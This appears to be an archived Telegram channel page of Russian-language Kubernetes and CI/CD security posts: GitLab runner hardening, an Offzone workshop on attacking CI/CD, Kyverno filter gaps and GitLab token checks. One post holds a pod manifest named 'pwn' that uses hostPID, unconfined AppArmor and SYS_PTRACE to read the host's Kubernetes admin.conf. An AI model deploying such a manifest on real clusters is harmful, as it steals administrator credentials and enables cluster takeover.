9 Sept 2024, 10:33 UTC≈3,470 views15 reactionsread 4 September 2026 Gitlab pre_build_script. Part 2
Так что же делать чтобы after_script не выполнялся после падения pre_build_script?
Можно, например, дергать из скрипта гитлабовскую апишку и канцелить джобу.
Но можно поступить проще, если разобраться как раннер запускает джобы внутри (все нижеперечисленное я изучал для k8s-раннера, полагаю что верно и для docker-раннеров тоже).
Тут важны два факта. Первый - для запуска любых скрип…
🔥6🥰3❤2👍2😁1😢1
Signed Pavel Sorokin
29 Aug 2024, 08:40 UTC≈3,250 views11 reactionsread 4 September 2026 Photo
Gitlab pre_build_script
Иногда есть необходимость дополнительно защитить Gitlab Runner. Например, если на нем имеются дополнетильные credentials, если он имеет особые сетевые доступы и т.д.
Способы защиты могут быть тоже разные:
- проверка того что тот кто запустил джобу входит в белый список
- проверка подписи коммитов
- проверка целостности джобы
- и т.д.
Для реализации такой защиты может применяться параметр ра…
🔥7😢3👍1
Signed Pavel Sorokin
19 Aug 2024, 11:12 UTC≈2,900 views6 reactionsread 4 September 2026 OFFZONE_CYBERED_SPECIAL - промокод на скидку на воркшопы OFFZONE (не только мой)
👍6
Signed Pavel Sorokin
19 Aug 2024, 09:05 UTC≈2,280 views5 reactionsread 4 September 2026 Второй год подряд буду проводить воркшоп на Offzone.
🔥3❤1👍1
Signed Pavel Sorokin
19 Aug 2024, 09:05 UTC≈2,630 views10 reactionsread 4 September 2026 Forwarded from @offzone_moscowVideo
🔧 Воркшоп «Ломаем CI/CD 2.0»
На воркшопе вы изучите работу с секретами в CI/CD и научитесь обходить защиты раннеров от PPE.
Что в программе:
➡️ Секреты в CI/CD: GitLab variables / vault.
➡️ Интеграция Vault с GitLab и проблемы в ней.
➡️ Интеграция Vault с K8s и проблемы в ней.
➡️ Защита раннеров от PPE и способы ее обхода.
Что потребуется:
➡️ docker,
➡️ kubectl,
➡️ vault (cli).
Когда: 23 августа, 14:30–17:30.
…
🔥6❤2👎2
Signed Pavel Sorokin
24 May 2024, 04:58 UTC≈3,470 views32 reactionsread 4 September 2026 File
Запись моего выступления на PHDays: https://phdays.com/forum/broadcast/?talk=645&tag=offense
Слайды прикладываю
UPD: youtube - https://www.youtube.com/watch?v=YAV9mbnlUho
🔥27👍4🤬1
Signed Pavel Sorokin
14 May 2024, 09:04 UTC≈8,200 views41 reactionsread 4 September 2026 Photo
Есть такая общеизвестная проблема когда делаешь non-root в k8s: контейнерам нужно биндить порты до 1024, что по умолчанию в Linux запрещено.
Лично по-моему само по себе такое ограничение - архитектурная ошибка в Linux, которая привела к куче проблем и сложностей: сервису, например nginx, нужно стартовать от рута, забиндить порт, а потом дропнуть лишние привилегии. Что уже само по себе звучит не безопасно и разумеетс…
🔥28👍6👎3❤2🤯2
Signed Pavel Sorokin
12 Apr 2024, 10:15 UTC≈3,110 views11 reactionsread 4 September 2026 Мой бывший коллега классно развил тему о которой я рассказывал в прошлом году на БЕКОН. Там шла речь о том чтобы при наличии доступа к docker API socket нельзя было поднять привилегии и залезать в чужие контейнеры. Но было ограничение - доступ к собственным контейнерам также сильно ограничивался.
Улучшенный подход он описал в статье на хабре. Теперь с помощью плагина https://github.com/I-am-Roman/docker-auth-plugin …
👏7❤3🤔1
Signed Pavel Sorokin
9 Feb 2024, 12:29 UTC≈3,090 views12 reactionsread 4 September 2026 Kyverno resourseFilters
Если разворачивать kyverno с помощью values.yaml по умолчанию, то в них окажется интересный параметр resourceFilters
Этот параметр добавляет в исключения Enforce политик kyverno некоторую часть ресурсов, среди которых хочется отметить почти первые три строчки. Они говорят о том что все yaml в неймспейсах:
- kube-system
- kube-public
- kube-node-lease
НЕ будут валидироваться.
Также в исключен…
🔥11👍1
Signed Pavel Sorokin
17 Jan 2024, 09:03 UTC≈3,570 views5 reactionsread 4 September 2026 Photo
Photo, posted without a caption
🔥5
Signed Pavel Sorokin
17 Jan 2024, 09:02 UTC≈3,440 views11 reactionsread 4 September 2026 Gitlab Access Tokens
Gitlab позволяет создавать токены доступа для групп, проектов или персональные для пользователей.
Если нам достался такой токен (например, нашли в репозитории), то встает вопрос - а что же именно с этим токеном можно делать?
Для этого можно использовать запрос:
curl --header "PRIVATE-TOKEN: token_here" https://gitlab.example.com/api/v4/personal_access_tokens/self
В ответе будет имя токена, …
🔥9❤1👍1
Signed Pavel Sorokin
13 Nov 2023, 09:03 UTC≈3,130 views9 reactionsread 4 September 2026 apiVersion: v1
kind: Pod
metadata:
name: pwn
annotations:
container.apparmor.security.beta.kubernetes.io/pwned: unconfined #disable apparmor
spec:
hostPID: true #root PID namespace
containers:
- name: pwn
image: ubuntu
command: [ "cat", "/proc/1/root/etc/kubernetes/admin.conf" ]
securityContext:
capabilities:
add:
- SYS_PTRACE # SYS_PTRACE to bypass ptrace access mode c…
🔥5👍4
Signed Pavel Sorokin
Showing the 12 most recent of 20 posts we hold for @naryl_sec. View and reaction counts are the latest single reading for each post, not a live figure, and a recent post is still accumulating both. A view count marked ≈ was rounded by Telegram before we ever saw it — t.me prints views in full below 1,000 and to three significant figures above, so ≈1,200,000 means somewhere between 1,150,000 and 1,249,999. Unmarked counts are exact. Text is reproduced from the public post preview and truncated for length.